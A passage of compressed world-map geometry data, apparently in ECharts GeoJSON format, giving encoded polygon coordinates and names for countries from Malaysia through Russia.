ÙƇ̈́˛[ĻґŇʽþĹơ\"],[\"@@½«aŨǚüFŋĿ«\"]],\"encodeOffsets\":[[[114063,2474]],[[106723,2798]],[[120714,4287]],[[102696,5422]],[[102245,6621]],[[104552,6393]],[[120397,4271]],[[119954,7341]]]},\"properties\":{\"name\":\"Malaysia\",\"childNum\":8}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ݨƈϪɦ§Ɏȋ̋yͅșʋ|եν͋ϰስˍJᵥࡃFᙵ@ᲃ@šυĻȏƃÉƙë܍¬ܧǂċǒVȜƝŘōĐĻµ·ùmŋµŇŝíؓնͅӤǝ݆Ɵǆŉઆ˯ۨๆࡗಂʁؚ׭੐ֵިɀRфƈnĤ¸ǘĘEPǄMՌȬʠËҔ̱ᅌfሼSҺ͹ਨ»Ҫſೠƶࢴǒ\"],\"encodeOffsets\":[[23942,-18064]]},\"properties\":{\"name\":\"Namibia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@č_@ĈĎç\"],[\"@@ņ]eƝŹsŷȼƤ²ný\"],[\"@@˟ƎÚƂĴőêȰYĒΫ\"],[\"@@ȞٌХЄл੾ەxțǑ­ʱĶಓ߼ُںğ˶Ťĕ\"]],\"encodeOffsets\":[[[171566,-23166]],[[172044,-21944]],[[171419,-21668]],[[168144,-20731]]]},\"properties\":{\"name\":\"New Caledonia\",\"childNum\":4}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ǠఉΦӋgȅ͂͗ȓωɕᠵङঃޛଵ¶ȷĎίƭEēϝȅǻĹǇȝ౉ɺЛȷ¥UӍϫΏVϛðʛŸ̡Țŝƕ^ؙ˱ɅĜщҨīJ̃Đ̅ĜÛ[­mĵáӝqѡɳǙֵʧȵ©۫ڑׂσƋp˙ˇΌźƂķȢґÇӟ΀D˖ǲMө̄ǁɦɰǿɄ®ΐؘÐ̒ʒොÎ¸ðώÑ`ń˖ȀɺրĨ՜Mᅬഞ˰൪୨␤ᕨౚ˳ؠһٜ̈́\"],\"encodeOffsets\":[[15339,23549]]},\"properties\":{\"name\":\"Niger\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ƇoòŎÖĝ\"],[\"@@Ɇěؚ˲Ɩ]Şվ͑ϜïΐUӎϬVȸ¦МొɹǈȞٮ̀ƮF˜ϑŎƯĄϹtƓô÷ȸ·Ďŭ¹փ̛ȋ¹gïGÙ÷ÑǉɡƏɥķηŧœÑЇɧř­ĻÍΕqËŉųȻÓýƧßŗǻ׋ǧȳÕĂŽǡƑÝ¿{ǉͭɑ¡hÕȬßẩʊǉƻĵAó^ilc oėÙƏı­go¯ġÅıƛħЯсʁܷǙˑɿƶº̋ձħŊȷěǩƚàǝșĻŽˬþ̏ȑ­ŖsœʓPļćŻǟ¼͏ʸŝʤÃƸþręCŤƴŘƍÓƽŎɎàŇĄǷÇɃ͔ί˔ࠗâɢƞʋÕāŅՇw|ȎdÈl¦k¼kæUńôK˞`xdlBçݨÔ֪ɨɾאɸȎͼŀRÀǄßƌʼk±´ŵǾFĖÂŐÄÎÆc٤ʨȶǚֶѢɴӞrĶâ®nÜ\\\\ڶǵъҧ\"]],\"encodeOffsets\":[[[7476,4525]],[[6968,13423]]]},\"properties\":{\"name\":\"Nigeria\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ñōǥ§׷ʼɳč֥ȴƇŃྦྷེîàƊĹò¶ɺZ¦`úǺæ\\\\ÂJfz«˔OÂX¢tbľXȜg^ĀŊòĂ¾¤Z´íǔķPhNLdE²¤¨ЊˢŲɪǖȒǸűĞwݸȲĊĎĸɐ_wqÁĳÃöÍÛĪÝĤ΃ȋ˿Ż֩²ރĭ¢ɈƉǱØБñ½Ǖľ¬Ƶǹ˻Ȏ͏\"],\"encodeOffsets\":[[-85649,11180]]},\"properties\":{\"name\":\"Nicaragua\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ũVĪĚį\"],\"encodeOffsets\":[[-173878,-19541]]},\"properties\":{\"name\":\"Niue\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@£ħīɪƐƁ\"],[\"@@˗ƭЁçŎ݂R\"],[\"@@łù́¼ɀ~\"],[\"@@ƩƪŮ@ĥ\"],[\"@@ٷżʜ²ѾĿɧŀƮ\\\\ȣǚҊоʊՎʖhЄʸѾŚو͎ƃƑՍ˓ŹʌëʽʥÜħ܏Ƒɀ̑ËʫɭįǆĿ¯ŻʥrĒ͆ӧłƷǆگé\"],[\"@@ŕLͤɍ©\"]],\"encodeOffsets\":[[[-69842,12437]],[[4328,52620]],[[4044,52982]],[[5004,54345]],[[4328,52620]],[[5454,54668]]]},\"properties\":{\"name\":\"Netherlands\",\"childNum\":6,\"cp\":[5.0752777,52.358465]}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Hıōɒņş\"],[\"@@ƅCÀĤĆğ\"],[\"@@ʣÜɨ¶|ő\"],[\"@@ƷhВİlč˅\"],[\"@@ЭJʀĞǮħ\"],[\"@@ů­ȴɂăǓ\"],[\"@@ȌܱȇÒƒӔĖ\"],[\"@@^˛ۉ Ր˲Ɯµ\"],[\"@@ӌˆǆȱҙȗ෽ǱॾΦÐάӆɒʍح\"],[\"@@тù­ʵϳAͽƷɭ¶ǈʔ̠hŤǸ\"],[\"@@ǅ{ÎŜĸğ\"],[\"@@˃Yzńʘ`Mŉ\"],[\"@@̒¡ɯǗҥȭջiȀǮ˚\\\\Ϫϴļƫ\"],[\"@@Ȫŝ΁ǄƘ¥\"],[\"@@ϥɡǿƌԘƠÎÉ\"],[\"@@ʩIÀƼȪƱ\"],[\"@@ԥɱЁu̩Ţ௒Ɔ\"],[\"@@QȵֱĈýǟחœΟɵĵžЦʞǇǖ୧ͦԵƃԏRϟȉ˗םڳͫࣳǴѽƁލÒۉҮѷ¹@ơϋIы_ȚƟͅбඕǘ͗ӷӻŜғǫտϿɶ̷ࠗӅ¼Ʒ߅ƩÁۣ۟؁άįÂʓƱƅٍ¼ΉÙԯ͹ƧʯʮࡋŭӃ،̳ƣʕ΋µʚҩđ˿گѝİʫŽ̧ƟaéńҭŮȩӤΓى˱§ʇżČšఫۛঋķŃńʋ­ÎƔߟɖŵϜҚĕɞŊɝ£ǭŬÀǜ϶ȼਯ͓ÌͶȘŲʦ«ώƂУԴЬȌPǩЀ̠۽ƓࡍקºϘО͹èůȬіȰͻıŅÈě͸๨ĔɖǃDŜӄĴɑøĆŔɧɧӕľǻŽ޳́ðĕȶ˰¬·ȌDƘࣰù׸è௵ÈĽȊ٠ɎƦÉк¸Ħ¼ҳ»ǼǠદĩĞюĊ઻¥ǦǬՌƚѼOѮȵϹˆВƲɱƀǺĒҺOhőҔƒ˘ȝتÐƎժƲǏĀʂĖųͣŅjŵ݉ɏЧǎ࠾ײߪ˜ĠÎ˱¹ǌȆ֜Ǡ̊ã΂ȬлŽʃĂҰԼ̀°ȽŦੂǔޓÇþΈؼźʵĦϨǴ઴êࠉÌѪʮՎȏĈƢϋæ²Ǝϗď±ŪˮƐЦqʱĶ׊ƈʮ̇ĝμଌĠ࢏ĚೲԾƄ˂րœʧžӪɎѲåָ̛ѪɩԥζǮɆkįͤҔqɨľҖƭԳͰߺ̨Ģ֚͟sȊࣼдƁŀͨƦԜƃцT؋سലۦÛѽͼĐǎȜ̦¼ʽȚ̌Ũڜĭгʟ̾SáΛ՜Ԭހǻ˞²݈έֱű௫ڠīǈȽʞUŲŨǆŝψ¾\"],[\"@@ҢūҩɣÖɬĞ\"],[\"@@ߞ˴Aŕߛǝ\"],[\"@@̝ļ˔HŃ\"],[\"@@μeɌ̉ॸß˭ƃຈȡጇЩŌʊํÿ،϶஥Ұ୊İ\"],[\"@@ܮͅ࠵ȘӁτ׊ʕ\"],[\"@@ղMີ«ԺĬҊ±\"],[\"@@ࢢęƓΏؔȀʀ˽৺ǥ׼¨ٺ̭෱ŋ᠏ၽይվ̵ɰטbȎƐᄨĞĳĎᛗŃ·ɎՄmఐ˒ਂүŒˬƈଫǅʢ̱ş˝ú§ʳѷť߯຅״ߪȩ̒щb̷ŻЃ͠Èɺ̄åҬĔӮěOĒஎîũਇũٺJגȗӂϢเۓѷצΰ̰Ҕţ\"],[\"@@࢙UᅮĠओĉ\"],[\"@@ୢǙƊ̒ҶÔĚʋশƤᓂǛ˴Ʌವч෋ǫ࢙Ʋ၉[؛üϡĐठƂႷXЁƚԎĜ߃Ěபṳ͞঒ȓ\"]],\"encodeOffsets\":[[[5208,61755]],[[5078,62551]],[[8298,64858]],[[8675,65196]],[[11501,66423]],[[13284,69504]],[[14206,69904]],[[15573,70598]],[[16139,70207]],[[17924,71267]],[[30676,71472]],[[21278,71772]],[[19718,71749]],[[20242,71902]],[[24183,72243]],[[24595,72261]],[[24004,72516]],[[31611,71459]],[[26201,72850]],[[-9168,72540]],[[19681,76177]],[[22127,80482]],[[11521,80498]],[[29745,80806]],[[17190,81825]],[[33307,82042]],[[21400,82176]]]},\"properties\":{\"name\":\"Norway\",\"childNum\":27}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@R¡ĲƃķJç¥ś³ſyYקmɫǐ˃ĵ׍ǶǳµõǂáVɵĉčtэɲ¨BĦ[¤Ň¦ɁäśÂəĩçfǏ¼ĕR¿i]ãҳŰmÞÞ¡\\\\ƫ_ƏîƧĞÙ£Z]¡qOֹЀӥ˄Í`m{a»Nÿ°ĉ´ŽĜgľĘrÂÐpļCĘÀŰîƄŮƜɪȂzjº¸Pǰşà®ƌȴȌ¦Ǵqǂƪə޼ϛάί̒ĆðuâvÁ¢ĵ®Ŀӊ̏¸MǶ´¶MUBióģ³øoǖaɤDæµæíæũ½cÎr^Ű¸æýĢ¿äĞĺ¼dÜOzq£Ƹ­ðĸ÷Ųa˨MȨÒȾ_Łأ\"],\"encodeOffsets\":[[90096,27786]]},\"properties\":{\"name\":\"Nepal\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@§ÓėØƀC\"],[\"@@lë̓ǲɨƔiǝ\"],[\"@@ďÑǔŗ׿ǁɼ̐cǨƠJǄƕ\"],[\"@@ĳŉ¸ð¼\"],[\"@@ǡŁuĘĝoƶȫƳûĩäØƺʗzʂĚ͜o\"],[\"@@őµƸǪ¥ų\"],[\"@@ۦ̖ů̇ǜɺʬsɛȇ˨Śʧ˙\\\\ȭǘÏࢽਡԇʝĤéǩğƖjĨƩɢ±OǕӁmĮƷşɕƔŨǍ߃̱āկūBĪŅ΍էÚƽ̙Ï؛ԡ́Í߭`ǋȲ̅GʫǼƝý՗ƺȬɡëÌŸȍÙIŐѠĴǥÈǌĪɍWRÚƪ¼¥ĆʊċØĶǡƖȞÃĴǺŖ²ŋfǀʪƨĺÍ©ƐԎЂ؆İSŘ֐Ȭ΀̼ƀeýØʸ`óêŢ¢ÎËȢʾƕ`ǄʈȢƢ֔ϲɌǈӺтΰʮAǯqyĽʆƱńα\"],[\"@@Ǔ¾ŞżǛ\"],[\"@@ƮútđՌǑƁƬ®ɔҏƹW΀їãҁӞŷðǳƂJç؎ʾɑ˰އঔ̉آςѸŗɥܟʕƝÉѣ͕Ɣϑůř˩ƞıɣПܟࢱ֡ͭŧǌʅM_ǜȗÇѸ֘ü˨ĉƦūƎࣙϊƝǆæưҮƪǘƬǢݜńü˽צŰįǐŌŭŠʱDʋϘǴğQ̦ĿÜ]ïǻńĹǶFğȾʹĥաۊǶȊȿƳ¿¶ǓȦØǄСҼ˴vãęʲͱ\"]],\"encodeOffsets\":[[[173239,-53757]],[[170211,-51979]],[[172181,-47986]],[[170987,-46264]],[[-180405,-44790]],[[178089,-41844]],[[177271,-42269]],[[179757,-37149]],[[177428,-35773]]]},\"properties\":{\"name\":\"New Zealand\",\"childNum\":9}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@åO@ńȲ˾ÈƏȓʡ\"],[\"@@ɄёОЩ൲ϵրܙͦŵmʏέ؅Ѝ͕ΟץɝdƦÙSʵ́ŭӇĈ։ࠣɛωٟݻŧȉɏhɝǯʁ࠷ϩȵѱĥछጊᠾ࠾֐၌ϣמ\\\\˦˨چÁĺѢĺ³ŸƕxՀǤðÂǷ˘Ȭ\"],[\"@@Źn̚ñ`˨ʎĩי\"]],\"encodeOffsets\":[[[60132,20704]],[[57742,25579]],[[57650,26267]]]},\"properties\":{\"name\":\"Oman\",\"childNum\":3}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@MΥ٫֕ۖߕÄ޽ںՓe˂ȕDƳ¦Ȟ_d[iűĩĒǖJ̆ƷáśīÉ_˧şĕ·ãÑ{­_©ÒǃZ·¹ǡaÙüÕ`NĻÙŇÇ@ˣ̻ġíaéÏR¹»ÝËΫƅГݽһɷ§¯ƍ̍Ʊƙ·ŉeí˟ý̛ʻįÛIęº¿Ƙȍôƅù§¥āŻŹȅ˟ʣć̵ըɋǛ£οƐǟ¼iľI´HÄjàHȱȎ̡ÖƟÐővÍuKÚšA}½¯Dgååa§O³Pão¬R°eɏ¿ǅËʗĹõNç¬Ù¢īDǫMīBËdÇ[ëhuC¡¦kMg_WuGʧȡFěaĉmıÑ£ēɋŲǇų̟̂řӨϿĖG̬̿͂ǉĝ˰£ළřıĻԋȀх¥ÃţྥqjbzêrʤĜSºNdÎªbnvŸ|Ɯ¼ʄŤĪWÔŒܚƦdƠ²xR^QǖÂ Gx²»{RΏZ~҈iͶܹ̂ا࠸ıĸǅǐ͌ğٶǿЎĹࣼöҀėʜŸל^ॖʴĮ߀МϮԼyʈĠƅƌӨʠξ@ɬƙΈʬиɔӲٔɦ̹؀ٞ¯ͮĆːŉƊվո£̨͗и¢âࡢԨ۸Ŋ\"],\"encodeOffsets\":[[74844,37750]]},\"properties\":{\"name\":\"Pakistan\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ȽĸŜê|łʏ\"],[\"@@¿ƌÞr]ƽ\"],[\"@@ēƇʂѵ˽ͿȉŐśЁѩۨŒ~Ūʜ͎Ʌ˵̨ĽċƧĞUųĕɰӓ̴ΝwƯĳŇǱÆ׫͍Bŗϔӛսɱȟ¨ƍԼǡɱȣĄȉΔγ¶ÛĮϋVƽÙ[ƧůɢƔĮbUŪ½ĘÄżĤ¯ØĉÆ·H@͜^jX|~`ºlƂïäÐÂ­ŊāǿŶc³ƇƖąʢnĩƶҐ̟ѢĚװ˔Ҧ͜శ̥תӝ\"]],\"encodeOffsets\":[[[-83561,7509]],[[-80791,8473]],[[-79231,8867]]]},\"properties\":{\"name\":\"Panama\",\"childNum\":3}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ԷσȕŗȳÏLŃo{iij{sªÖë°] {WýƶЃŶħgRI«°ñĊÅŐƏĆġHŃĵũĳũۤĉǖбۼ^ȊŘØͼ˺|^Èty©m­MÝଢ଼À~êß¸¦OªFÐbżÄĘ¬ĸEƒkĄFݦಧʙͅāګǠУЩՁ]ƗǞɯȽͻǢя̾ǃǃřXƓԓҷk¡ľşVÑ@@AÙÉĉÛƕ­¦ʋĽǹЯśޙ֎Ǐ͚޹Ӱ੕юୁڒίњͳɠω٪İºδԝ࡮ˏʐÉͬ΍͂đϜϙغӛఈԫڀԯࣈ७ײmƴȞ¤Ǧϡߺ¬̆پۜƮĞæǁ¦ˡeq³őv«i¹b¥JĎEùŃ·T°Cø ĄĘ¸^ÚĎ¿Ĳ±¢}ðRÖZ¼¾^ŋă²×ÎóÀ{æAĢl¾j²^Môf´¤ƨĔ˂ʬܐĖÙ͊Ь঴ΚӸΰѦԐŴӎZƄwS̤ƑƴÇƈÏ¤ÑLʊgǞü˰űlt­ÂÚ¾»¤¡¢¿êɩ¨ÝǊ·ÊÍºwÄÑǖ©Ƙύʦřϓƒ½¤¯؈MȠØªÄ¼Ä¾¨\\\\ǌÑƌġǚlêÊòh¸hɚŕ¶ÁÔYʀő¦¯äÌe՛ऻǤíEÄhJ}¶ÖƗŴģ¨×KÅu£KÙ ġ]ß°u¬½ŁcǅRß]ƥƩܷŻΉȳąĭīśĝùµŏw±yýљƵʡăuÍĊ̱\"],\"encodeOffsets\":[[-74892,-6621]]},\"properties\":{\"name\":\"Peru\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@έƽ̀ɚîÛ\"],[\"@@ɂŕĭÏΗêʄļ\"],[\"@@őYŃȼȎÞɠśȗƣ\"],[\"@@ōýbĦĬg\"],[\"@@©Û·ôržêfFƻ\"],[\"@@ËoKľØč\"],[\"@@šUWĀźé\"],[\"@@éœķöǢ\"],[\"@@ƾĤ˙Ƒ̙Ȑģþɿo̵ŔŽXίͧ͝Eҗ̩ࡰŕÏʷӕǪȋâУˑ͉ĩЄʯǍ׷̜œƠýӶȆ͸ғΠơSďͳʛʘɅƝ©ǊƧЉہƫfȚˎض֘ǲŜɸ͒ɨΒɩ¥͑ͰƲǨ̶˜ŚΆɮēÌƄʐWwخ҈λ\"],[\"@@ÉÔèȄĊɑħ\"],[\"@@Ѕǁƽrĳǌ̚ˌƌrȮŏdȩ\"],[\"@@ǏǢƠ˒pѳ\"],[\"@@Ļ}¸ƺƀÏûë\"],[\"@@ģ¡AƶƐŐ©ɣ\"],[\"@@ŗIŅɖʯƎƋ˸ÒŜ͔ŀΖƔ͐ɰĜɈÏ¶ţͿޓWɑƞ˩ǃǫ\"],[\"@@`Ѥո઴ܽʯɫˣ֭\"],[\"@@¸ŏáBjŎ\"],[\"@@ýÓŎ̄༾๜èиȺ˺u̡ƈϟˉơƫɡ·ŧ̅ևऽۇ\"],[\"@@űč´Ŏþ\"],[\"@@̘|ĆƉ[ΧɊБŁıŻƬ˭ȷŖLԨĽƲǻīԦȴǉ\"],[\"@@ĿMĻưŴlĈǍ\"],[\"@@˼g´ŻɜĂȽˇʟƓۇ͇Ų৖ƿǰĨϾɽ\"],[\"@@ÿYëɚƦFǵ\"],[\"@@ņ¬òǩʯGĿʖǸŏ\"],[\"@@șŪƲ¨Ƶ\"],[\"@@äǥǺŉԇè̙ƌǁхĄǕǒįǼÞǨң͚ŵΖߐ\"],[\"@@˘ˑJǵӑ϶ˇʓâքЖʝ\"],[\"@@ãȽùȎàɢŦ°§ʡ\"],[\"@@HñƁʸźȅ\"],[\"@@ðŷ·΀˘ɇ\"],[\"@@мːʧdбū˳Ɓå˃ʖɫքʿȲÀĖʮ\"],[\"@@ǚÝġɑƥľîǲ\"],[\"@@ƭčŗŎƾΐǊǧÁȧ\"],[\"@@č̋ÿ͐ǎ\"],[\"@@شˏǌĞƆĲyħڙ̰ґ͑߃ґɃXɛǷ́ʮӳËŽŜ΍ϐȧÜÈóŶάƜʴŉƘοǐðnȎиȋSīɍÛɨ̓ƃ̜ÙéϿƵļÒȐՙņŭͮӋϺŃkǘЭÉǛȉ˞ԉΖɵăƁǋȽ~ɉǤǟãi͒ʲʰfŸ̛ȤJͯű{ǁ˸Ɨ¶ʹ୼¶ÒˢɻǬÀU౺ȰܶтĜ\"],[\"@@ă«ĲƘmī\"],[\"@@TùſîŬL\"]],\"encodeOffsets\":[[[123137,5383]],[[124068,6222]],[[125024,6583]],[[125888,7587]],[[119890,8073]],[[120172,8412]],[[127803,9363]],[[126667,9460]],[[129031,9545]],[[129085,10001]],[[127585,10023]],[[128707,10153]],[[122795,10738]],[[125594,10725]],[[126087,9282]],[[126332,9677]],[[126728,11555]],[[120127,8643]],[[122739,11802]],[[127565,11616]],[[127600,11769]],[[125437,11894]],[[122920,11985]],[[122983,12460]],[[125599,12605]],[[128246,12829]],[[126686,12583]],[[125025,12652]],[[126746,12753]],[[126241,13162]],[[123602,13803]],[[124841,13866]],[[127339,13960]],[[124963,15366]],[[124008,19063]],[[124848,19349]],[[124438,19827]]]},\"properties\":{\"name\":\"Philippines\",\"childNum\":37}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@áŦŔƾ±ˣ\"],\"encodeOffsets\":[[137826,7560]]},\"properties\":{\"name\":\"Palau\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ȌġǧɡĨéǌ˨ŷ\"],[\"@@ƅÁćÞɎ[\"],[\"@@]ßĉĨ\"],[\"@@ǺÂÅȧɫĒƷ͐ʰʻ\"],[\"@@ɔÑĘȿϩÔöÑƨü\\\\\"],[\"@@ȡŎĊžĤµtȕ\"],[\"@@˒ġ^ŝϝǘĮ¨\"],[\"@@dÑĳʀĦĘU˅\"],[\"@@ɝĪɔoJù\"],[\"@@ȵǘ\\\\Ŕɖĳ{Ƿ\"],[\"@@ȧƧ̿ŢšΎϋ̈́}Ф̬Ƨ̼ѱ̘ȡŔʳ\"],[\"@@ƝŀłĮȭ\"],[\"@@ę˔üĆĂǡãǷ\"],[\"@@ŕ¸Ħņpƽ\"],[\"@@ǜìʐŅ¯Й̯ɅƆʁÇďǯę̍Zʉً̯˿ۏwɩǲʃٗϔĂǔުĥЈ¼ŌÜņμä·ćȧĢǷ׼ÞΪФ̂Þßֶ˔ă\"],[\"@@qóđłĄ¬ù\"],[\"@@AᇴħƔĨͦCᲘ@ǌྴׯԖġҶ̽ΊiԠѯȺζοkӣ໒ջȢɏ̇؏·ƑħȤҙ޾؍ĶϙǢşŐ̙ԬhÄϹؼǅȿıĨǧࠌȇ͹Ñǜǯ˝ŗʫÞəȌအʄكִ­ˢ˩Ğԇܾࢷɲġƞ̓Ä̯ǅЧʠʌНĝí˅zĄǙࣷķƩżşyɦƣ˖r˂ŇɠʍUǗ؁̭ΕƄअ©ƁĒ\"],[\"@@ÕÛŷǒÑш͛Ҧ৳وˑøäƔ২֭ࠠܕĬȷƕͻ\"],[\"@@ɫBǡƾɠøǞïPǇ\"],[\"@@̶ĉșĻևuĠȠΌ\\\\\"],[\"@@ȁèĲƺǙ\"]],\"encodeOffsets\":[[[157221,-11751]],[[157984,-11634]],[[154521,-10818]],[[154707,-10260]],[[154142,-9570]],[[153954,-9721]],[[156295,-9174]],[[154734,-8943]],[[147033,-8685]],[[151579,-5966]],[[159701,-6847]],[[150709,-5562]],[[158359,-5563]],[[149524,-4839]],[[155562,-4399]],[[156335,-3208]],[[144360,-9337]],[[156637,-4870]],[[154048,-2725]],[[150598,-2007]],[[153360,-1590]]]},\"properties\":{\"name\":\"Papua New Guinea\",\"childNum\":21}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@βছثНВȷ¡ѭºǩδοċÁĀɹıķɕ֥ГˣʗµÉX¯ºŉX·uĽŢ÷ʷQÅRϟņ͋ǞҹNǯēыÐʱǡʧpdƘ˧ȎʗǕˇĤɩ̲҅ƀŹÁȹŨÚǆʋ«҇ƢĠǅ̍œέ˒ǬŴřèɱ࡛͸UŅñqñEJZĔŘòy˸{zƱ¼]jzêŗǤŴȾÓƘÃzg`Ò¦ĈėİɕŘĿĄV°żĀÚâþDdDÊŽϒ˘ùsƸ̅ņဌ˸̾ɜ๜ʆμŻ˕¼ʹ̿٤øԖ࿮»ӂSN¶ÐKêoexIêcĦòìµǟ\"],\"encodeOffsets\":[[24049,55235]]},\"properties\":{\"name\":\"Poland\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ūɸGŋw\"],[\"@@тÁPś̍ɥ਍jÉ̶ĘŔࡼ¯\"]],\"encodeOffsets\":[[[-66995,18541]],[[-67716,18888]]]},\"properties\":{\"name\":\"Puerto Rico\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ƈȝϛĳЕЃ¡ܗ̯ŋۣԃߋ̉ơӗ͢ĻӴϯ˯˅ߕqϥуɝĆɅŕ̇ȲΉɕĲ˓ôǾŴџ¢̈́άФň͕ĴȮО£ȨӯȚŗťɵ͞ѸϤऌϐوېǲȎȥࠀťŠȂȳ݆͊῭͒͠ǚҨ˾ęLŭɾǫ\"],\"encodeOffsets\":[[133660,43557]]},\"properties\":{\"name\":\"Dem. Rep. Korea\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@мġ˙ăǩĖĐ\"],[\"@@ϼGQÕҙAģŌǔ«\"],[\"@@è͝GÿĢͶÇ\"],[\"@@ǛÖŨ´ħ\"],[\"@@ʻļɒpªū\"],[\"@@ũYlĒľ÷\"],[\"@@έƣٙĮͳõƸͰÉࡠǴmŋĀΏÏǬȖøȖ˨́˯ȃĻĎĘҒҌٸŸ՘ÏߒōÆĢƪіǒĨ˙ؾlɎŮѺÜɧˤş׹ѭĲ֓ȇƧŘũáȉţĭΗiҎԗ̃ԉȦɵŰNУϭң\"]],\"encodeOffsets\":[[[-17603,33658]],[[-26264,38750]],[[-28822,39376]],[[-29328,39450]],[[-27725,39571]],[[-31884,40353]],[[-7583,38072]]]},\"properties\":{\"name\":\"Portugal\",\"childNum\":7,\"cp\":[-8.7440694,39.9251454]}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@lÕ\\\\±«{p¥pǉÂîʵĥڧYʻলŷ˞ƺ¬_ïĚñ²_ǖ@ŤwĄđNđňƃâޅjº¹`ė@Õxï¤ä[üYĨhĊp̜ƊƼõÎÍňÛɑŽۅĉřǳIţaίʭɋͥǝȓʑßq¹ËµFåËåµÙCƋúǳHɭțนɾνĲpÂͬМ˾ȨɈ͊Ӣɑ˴ଫӘףЀߕȢȳǜ׵ЌΓӎƃƤƙöíºB|sx̾ঘBцѦޘเ̈ޖVވѿj̅\"],\"encodeOffsets\":[[-59555,-20648]]},\"properties\":{\"name\":\"Paraguay\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@đëì]~ɼɘ D_ƫȝ\"],[\"@@ÐȠɆŮÛÊ×lÏkkNOdÔȺ°Ƭ°ĺņØĤkêi`æ£ÊKjƃķّӏģ\"]],\"encodeOffsets\":[[[35173,32044]],[[35718,32121]]]},\"properties\":{\"name\":\"Palestine\",\"childNum\":2}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ŨIĿƅŊȥE³ƞɌ¶Ɨ\"],[\"@@°£Ə¢ĠB\"],[\"@@ǒʳóĢŔ\"],[\"@@ËÈÖIć\"],[\"@@ŧemŎƴG]ğ\"]],\"encodeOffsets\":[[[-152905,-18114]],[[-146883,-17018]],[[-142360,-9927]],[[-143437,-9652]],[[-143434,-9124]]]},\"properties\":{\"name\":\"Fr. Polynesia\",\"childNum\":5}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@÷iíkÏ@³RlÓì©Ģ¼XýіȾӨɒƠʀȿ·ͅľЅƱ͓Ƈ½\"],\"encodeOffsets\":[[52499,25198]]},\"properties\":{\"name\":\"Qatar\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĘēŒ¯˲©MÎĦiˢĨƲbƐ£ŚġůΕёï Ǿǡ³ʱধ̧~˳Ǹϫ˵ŮܷƇ׿˱ᓝƐ§ĨƈŊ˗ƈaVǋƾºĘÆlæM^Yáŧ²ū}ųīěgƷŀɯħäƍCvP¶HàNZjƧøĞƲl՗ɴgʀ]R[SeUeE³ÑøȇĘįŒrȒĘŬĨ̤݆ਈ݄ψƮºìæÂEǤāȄLߚÃʹǧТƾȌlȂɈtÖÒ¤zúŘvƪ~̦ėՐۃϪ̥Ƙ˱Ƒ࢕Śů\"],\"encodeOffsets\":[[28890,46542]]},\"properties\":{\"name\":\"Romania\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ýÎɚbƛï\"],[\"@@̢µջ˯˝ɑ}ƱāǦظՄ\"],[\"@@ֻ˝ɋ[ٓӕ̊Ϟ՜̶ƂŎķɤjШȒtŭȧ\"],[\"@@ȭ£ѠήӺƾܫӇ\"],[\"@@ɻËӆ˂ʉȵ\"],[\"@@ǗcǶ̒]˭\"],[\"@@ѱɕŻ¬qǢϲĒΖ̸ƧЁ\"],[\"@@ȥØǬŊĤeéƻ\"],[\"@@ӂறƙ݉ŦϛѢଋݮൣ֑ԠˇÀՃħѿृa˫ֈߋɦĂ͡ů˧űѾףŢсڃȷ҄Ǫׄ×ϔǾΨ˅ئɴیÛࢾŠӼПќ½ҌǐѪҞˌƀ͒¡ưϖ̷͔ΪĨ\"],[\"@@Ļƣ˹~϶Ŧ\"],[\"@@ɠ·С̵ɑǮȕé̂΀̨ĕ\"],[\"@@۲ǙдIɐƿşʷGÏðŕԇFࡹಉÊ̶ϲҞÖ͊ʖ¶O̥ʟʹáǌ 